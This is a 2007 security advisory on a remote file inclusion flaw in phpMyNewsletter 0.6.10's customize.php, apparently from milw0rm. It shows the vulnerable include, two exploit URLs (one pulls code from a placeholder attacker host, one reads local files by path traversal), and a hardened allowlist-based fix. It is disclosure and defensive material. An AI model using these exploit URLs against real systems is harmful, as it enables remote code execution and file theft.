securityvulns SECURITYVULNS:DOC:16586
Apr 05, 2007

phpMyNewsletter 0.6.10 (customize.php l) RFI Vulnerability:

Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file

PHP code :
°°°°°°°°°°
---- /include/customize.php ----
<?
$langfile = $l;

include $l;
?>
---- /include/customize.php ----

Exploit :
°°°°°°°°°
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With http://[attacker]/code.txt containing:
<? echo $text; ?>

or
http://[target]/include/customize.php?l=…/path/file/to/view

Patch :
°°°°°°°
The author has been alerted and the latest version (0.7beta1) has been patched.
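
One way to close this class of bug, shown as an added example and not the project's actual 0.7beta1 patch: read the parameter explicitly, map it to an allowlist of language files on disk, and confirm the resolved path stays inside the language directory. The lang/ directory, the file naming and the default language are assumptions.

```php
<?php
// Added example: hardened replacement for the include in /include/customize.php.
// Assumption (not from the project): language files are lang/<name>.php next
// to this script, e.g. lang/english.php; both names below are hypothetical.
const LANG_DIR = __DIR__ . '/lang';
const DEFAULT_LANG = 'english';

function resolve_lang_file(?string $requested): string
{
    // Allowlist = language files that actually exist on disk.
    $allowed = [];
    foreach (glob(LANG_DIR . '/*.php') ?: [] as $path) {
        $allowed[basename($path, '.php')] = $path;
    }

    // Accept only a short lowercase name. This rejects URLs, slashes,
    // dots and NUL bytes before the value gets anywhere near include.
    if ($requested === null || !preg_match('/\A[a-z]{2,20}\z/', $requested)
        || !isset($allowed[$requested])) {
        $requested = DEFAULT_LANG;
    }
    if (!isset($allowed[$requested])) {
        throw new RuntimeException('No language file available');
    }

    // Defence in depth: the resolved path (symlinks followed) must still
    // be inside LANG_DIR.
    $real = realpath($allowed[$requested]);
    $base = realpath(LANG_DIR);
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('Language file outside allowed directory');
    }
    return $real;
}

// Take the value from the query string explicitly instead of relying on
// register_globals to populate $l, as the original script does.
$l = (isset($_GET['l']) && is_string($_GET['l'])) ? $_GET['l'] : null;
$langfile = resolve_lang_file($l);   // an uncaught exception ends the request
include $langfile;
```

Setting allow_url_include = Off in php.ini (available from PHP 5.2) blocks the remote-URL variant, but the local-path variant still needs the allowlist above.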

frog-m@n

milw0rm.com [2007-04-04]